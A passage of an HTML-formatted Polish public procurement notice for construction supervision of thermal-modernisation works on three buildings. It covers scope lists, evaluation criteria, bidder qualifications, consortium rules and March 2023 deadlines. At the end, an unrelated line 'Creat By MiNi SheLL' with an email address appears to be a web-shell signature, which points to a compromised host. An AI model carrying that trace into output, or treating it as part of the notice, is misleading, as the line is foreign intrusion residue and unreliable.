zabudowę ścianki działowej na 1 piętrze – mieszkanie nr 11,<br/> 42) rozbiórkę ścianki działowej w mieszkaniu nr 10,<br/> 43) zakup i montaż kuchenek gazowych dwupalnikowych,<br/> 44) wymiana instalacji odgromowej - wg części instalacyjnej opracowania,<br/> 45) wykonanie zaleceń zgodnie z ekspertyzą ornintologiczno-chiropterologiczną,<br/> 46) wykonanie instalacji AZART - wg części instalacyjnej opracowania, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Określony w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie inspektora w branży konstrukcyjno -budowlanej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 2 Budynek przy ul. Ofiar Terroru 70 oraz przy ul. Adama Mickiewicza 6 <br/> W budynku przy ul. Ofiar Terroru 70 przewidziane są prace termomodernizacyjne obejmujące swym zakresem między innymi:<br/><br/> 1. OPIS PRZEDMIOTU ZAMÓWIENIA<br/> W budynku przy ul. Ofiar Terroru 70 przewidziane są prace termomodernizacyjne obejmujące swym zakresem między innymi:<br/> 1) izolację i ocieplenie ścian fundamentów i piwnic,<br/>termomodernizację i remont elewacji – docieplenie ścian płytami styropianowymi wraz z otynkowaniem oraz okładziną z płytek klinkierowych,<br/> 2) odtworzenie gzymsów i innych elementów dekoracyjnych,<br/> 3) hydrofobizację powierzchni ścian do wys. 2m wokół budynku,<br/> 4) docieplenie ościeży okiennych i drzwiowych,<br/> 5) ocieplenie ścian wewnętrznych strychu,<br/> 6) remont schodów zewnętrznych,<br/> 7) wymianę obróbek blacharskich, parapetów zewnętrznych,<br/> 8) wymianę parapetów wewnętrznych,<br/> 9) wymianę rynien i rur spustowych,<br/> 10) wymianę stolarki okiennej,<br/> 11) wymianę stolarki drzwiowej zewnętrznej,<br/> 12) montaż zadaszenia przed wejściem do budynku,<br/> 13) wygospodarowanie pomieszczenia kotłowni gazowej (wraz z zabezpieczeniem ppoż przegród budowlanych),<br/> 14) wymianę elementów konstrukcji więźby dachowej,<br/> 15) docieplenie oraz remont dachu z wymianą pokrycia i wyłazu,<br/> 16) wymianę obróbek blacharskich,<br/> 17) remont kominów,<br/> 18) wymianę obróbek blacharskich kominów,<br/> 19) likwidację naświetli z zamurowaniem otworów w ścianach i ich zasypaniem,<br/> 20) montaż budek lęgowych dla ptaków zgodnie z ekspertyzą ornintologiczno-chiropterologiczną,<br/> 21) remont i wykonanie opaski wokół budynku, wraz z odtworzeniem nawierzchni wokół budynku zgodnie z ustaleniami z Zamawiającym,<br/> 22) roboty wykończeniowe i naprawcze po robotach wewnątrz budynku,<br/> 23) remont oraz wykonanie odpowiedniej wymaganej wentylacji w pomieszczeniach budynku,<br/> 24) modernizacja systemu grzewczego - wykonanie instalacji c.o. i c.w.u. (zgodnie z częścią sanitarną projektu technicznego),<br/> 25) wyposażenie budynku w kocioł gazowy jednofunkcyjny z automatyką,<br/> 26) zakup i montaż kuchenek elektrycznych dwupalnikowych,<br/> 27) podłączenie kuchenek elektrycznych (zgodnie z częścią elektryczną projektu technicznego),<br/> 28) modernizację instalacji elektrycznej w zakresie związanym z termomodernizacją (zgodnie z częścią elektryczną projektu technicznego),<br/> 29) wykonanie instalacji AZART (zgodnie z częścią elektryczną projektu technicznego),<br/> 30) wymianę instalacji odgromowej ( zgodnie z częścią elektryczną projektu technicznego)<br/><br/> Budynek przy ul. Adama Mickiewicza 6<br/> W budynku przy ul. Adama Mickiewicza 6 przewidziane są prace termomodernizacyjne obejmujące swym zakresem między innymi: <br/> <br/> 1. OPIS PRZEDMIOTU ZAMÓWIENIA<br/> W budynku przy ul. Adama Mickiewicza 6 przewidziane są prace termomodernizacyjne obejmujące swym zakresem między innymi:<br/> 1) wykonanie izolacji i ocieplenia ścian fundamentów i piwnic,<br/> 2) remont elewacji – docieplenie ścian płytami styropianowymi wraz z otynkowaniem,<br/> 3) wykonanie hydrofobizacji powierzchni ścian do wys. 2,4m wokoł budynku,<br/> 4) docieplenie ościeży okiennych i drzwiowych,<br/> 5) remont schodów zewnętrznych,<br/> 6) wymianę daszku nad wejściem do budynku,<br/> 7) wymianę obróbek blacharskich i parapetów zewnętrznych,<br/> 8) wymianę parapetów wewnętrznych,<br/> 9) wymianę rynien i rur spustowych,<br/> 10) wymianę stolarki okiennej,<br/> 11) wymianę stolarki drzwiowej zewnętrznej,<br/> 12) wygospodarowanie pomieszczenia kotłowni gazowej wraz z zabezpieczeniem ppoż przegród budowlanych,<br/> 13) wymiana elementów konstrukcji więźby dachowej,<br/> 14) docieplenie oraz remont dachu z wymianą pokrycia i wyłazu wraz z wykonaniem komunikacji dachowej,<br/> 15) wymiana obróbek blacharskich,<br/> 16) remont kominów,<br/> 17) wymiana obróbek blacharskich kominów,<br/> 18) montaż budek lęgowych dla ptaków zgodnie z ekspertyzą ornitologiczno-chiropterologiczną,<br/> 19) remont i wykonanie opaski wokół budynku, wraz z odtworzeniem nawierzchni wokół budynku,<br/> 20) roboty wykończeniowe i naprawcze po robotach wewnątrz budynku,<br/> 21) remont oraz wykonanie odpowiedniej wymaganej wentylacji w pomieszczeniach budynku,<br/> 22) modernizacja systemu grzewczego - wykonanie instalacji c.o. i c.w.u. (zgodnie z częścią sanitarną projektu technicznego),<br/> 23) modernizacja instalacji elektrycznej w zakresie związanym z termomodernizacją (zgodnie z częścią elektryczną projektu technicznego),<br/> 24) zakup i montaż kuchenek elektrycznych dwupalnikowych,<br/> 25) wykonanie instalacji AZART (zgodnie z częścią elektryczną projektu technicznego),<br/> 26) wymiana instalacji odgromowej (zgodnie z częścią elektryczną projektu technicznego), </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Określony w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie inspektora w branży konstrukcyjno - budowlanej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 3 Budynek przy ul. Ofiar Terroru 78:<br/>1. W przedmiotowym budynku będzie wykonana instalacja c.o. i c.w.u. do podgrzewania c.w.u., odgromowa wraz z modernizacją instalacji elektrycznej oraz wymaganą wentylacją w pomieszczeniu wymiennikowni. Przewiduje się również wykonanie przyłącza kanalizacji sanitarnej oraz roboty związane z dostosowaniem pomieszczenia przeznaczonego na węzeł ciepłowniczy Poza wyżej wymienionym, w budynku przewiduje się wykonanie robót budowlanych zgodnie z dokumentacją projektową.<br/> W budynku przy ul. Ofiar Terroru 78 przewidziane są prace termomodernizacyjne obejmujące swym zakresem między innymi:<br/> 1) roboty przygotowawcze,<br/> 2) roboty demontażowe,<br/> 3) przygotowanie pomieszczenia wymiennikowni,<br/> 4) doprowadzenie zasilania do projektowanego węzła cieplnego,<br/> 5) wykonanie instalacji odgromowej,<br/> 6) wykonanie przyłącza kanalizacji sanitarnej,<br/> 7) doposażenie budynku w instalację cwu, tj. montaż rurociągów przewodów wody ciepłej i cyrkulacji, zaworów odcinających i regulacyjnych wraz z robotami towarzyszącymi (montaż wodomierzy jednostrumieniowych suchobieżnych z modułem radiowym w uzgodnieniu z Zamawiającym), izolacja przewodów. Podłączenie przewodów cwu do istniejących lub nowoprojektowanych – wg części instalacyjnej opracowania,<br/> 8) doposażenie budynku w nową kompletną instalację centralnego ogrzewania wraz z montażem podzielników ciepła w uzgodnieniu z Zamawiającym,<br/> 9) prace towarzyszące. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Określony w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie inspektora w branży instalacyjnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) zdolności do występowania w obrocie gospodarczym; <br/> Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.<br/> 2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów,<br/> Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie<br/> 3) sytuacji ekonomicznej lub finansowej<br/> Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie<br/>4) zdolności technicznej lub zawodowej<br/> <br/> zdolność zawodowa w zakresie dysponowania osobami zdolnymi do realizacji zamówienia opis warunku: Zamawiający uzna warunek za spełniony, jeżeli Wykonawcy wykażą się dysponowaniem:<br/> <br/> a) co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno- budowlanej bez ograniczeń – dotyczy zadań 1-2, <br/> b) co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi<br/> bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych przy czym do spełniania warunku wystarczą:<br/> ◦ uprawnienia w zakresie instalacji i urządzeń gazowych, cieplnych, wodociągowych<br/>i kanalizacyjnych – dotyczy zadania nr 1 i nr 2,<br/> ◦ uprawnienia w zakresie instalacji i urządzeń cieplnych, wodociągowych i kanalizacyjnych – dotyczy zadania nr 3.<br/> c) co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanym bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych<br/>i elektroenergetycznych, przy czym do spełniania warunku wystarczą uprawnienia w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych – dotyczy wszystkich zadań. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego (art. 108 ust. 1 ustawy Pzp oraz art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami- załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) formularz oferty – wg wzoru na załączniku nr 1a i/lub b i/lub c,<br/> 2) doświadczenie inspektora w branży konstrukcyjno -budowlanej – wg wzoru na załączniku nr 2ab,<br/> 3) doświadczenie inspektora w branży instalacyjnej – wg wzoru na załączniku nr 2c,<br/> 4) dokumenty potwierdzające posiadane doświadczenie inspektora w branży konstrukcyjno -budowlanej,<br/> 5) dokumenty potwierdzające posiadane doświadczenie inspektora w branży instalacyjnej,<br/> 8) oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy występujący wspólnie (uwaga dotyczy tylko konsorcjum/spółka cywilna) – wg wzoru na załączniku nr 4,<br/> 9) zobowiązania podmiotów trzecich do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia – dołączyć jeżeli Wykonawca zamierza spełnianie warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych, doświadczenia wykazać wykorzystując zasoby podmiotów trzecich,<br/> 10) pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu, albo do reprezentowania w postępowaniu i zawarcia umowy, z którego wynika zakres, tj. określenie do jakich czynności uprawniony jest pełnomocnik – dołączyć, o ile dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy występujący wspólnie (np. konsorcjum, spółka cywilna, Wykonawcy, którzy zawarli porozumienie), mają<br/>obowiązek ustanowić pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w<br/>niniejszym postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, chyba że pełnomocnictwo takie wynika z<br/>dołączonych do oferty dokumentów np. umowy konsorcjum lub umowy spółki cywilnej.<br/>Uwaga: pełnomocnictwo musi być udzielone przez wszystkich Wykonawców wchodzących w skład konsorcjum oraz<br/>powinno mieć określony zakres.<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie o niepodleganiu wykluczeniu<br/>oraz spełnianiu warunków udziału w postępowaniu (wg wzoru na załączniku nr 2 do SWZ) składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę<br/>Wykonawców występujących wspólnie.<br/>4. Zamawiający rezygnuje z ustalenia odmiennego określenia wymagań co do realizacji zamówienia dla konsorcjum.<br/>5. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>6. W przypadku, o którym mowa w ust. 5, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty wykonają poszczególni Wykonawcy wg wzoru na załączniku nr 5.<br/>7. Wykonawcy wstępujący wspólnie, ponoszą solidarną odpowiedzialność za wykonanie umowy. Problematykę zobowiązań<br/>solidarnych w zakresie nie uregulowanym przez umowę konsorcjum regulują przepisy Kodeksu cywilnego.<br/>8. Wszelka korespondencja oraz rozliczenia prowadzone będą wyłącznie z pełnomocnikiem (liderem konsorcjum) <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowy zakres zmian określają projekty umów stanowiących załączniki 6a,6b i 6c do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-09 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platforma zakupowa</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-09 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-07</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z postępowania o udzielenie zamówienia publicznego prowadzonego na podstawie ustawy Pzp zgodnie z art. 7 ust. 1<br/>ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego wyklucza się:<br/>1) Wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy, o której mowa powyżej,<br/>2) Wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r.<br/>o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w<br/>wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim<br/>beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu<br/>na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy, o której mowa powyżej,<br/>3) Wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29<br/>września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach<br/>określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką<br/>dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę<br/>rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy, o której mowa powyżej.<br/>6. Wykluczenie następuje na okres trwania okoliczności określonych w ust. 5<br/>7. W przypadku Wykonawcy wykluczonego na podstawie ust. 5, Zamawiający odrzuca ofertę takiego Wykonawcy<br/>odpowiednio do trybu stosowanego do udzielenia zamówienia publicznego oraz etapu prowadzonego postępowania o<br/>udzielenie zamówienia publicznego.<br/>Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty<br/>zgodnie z § 4 rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych<br/>środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający do wykonawcy (Dz. U.<br/>poz. 2415)

Creat By MiNi SheLL
Email: jattceo@gmail.com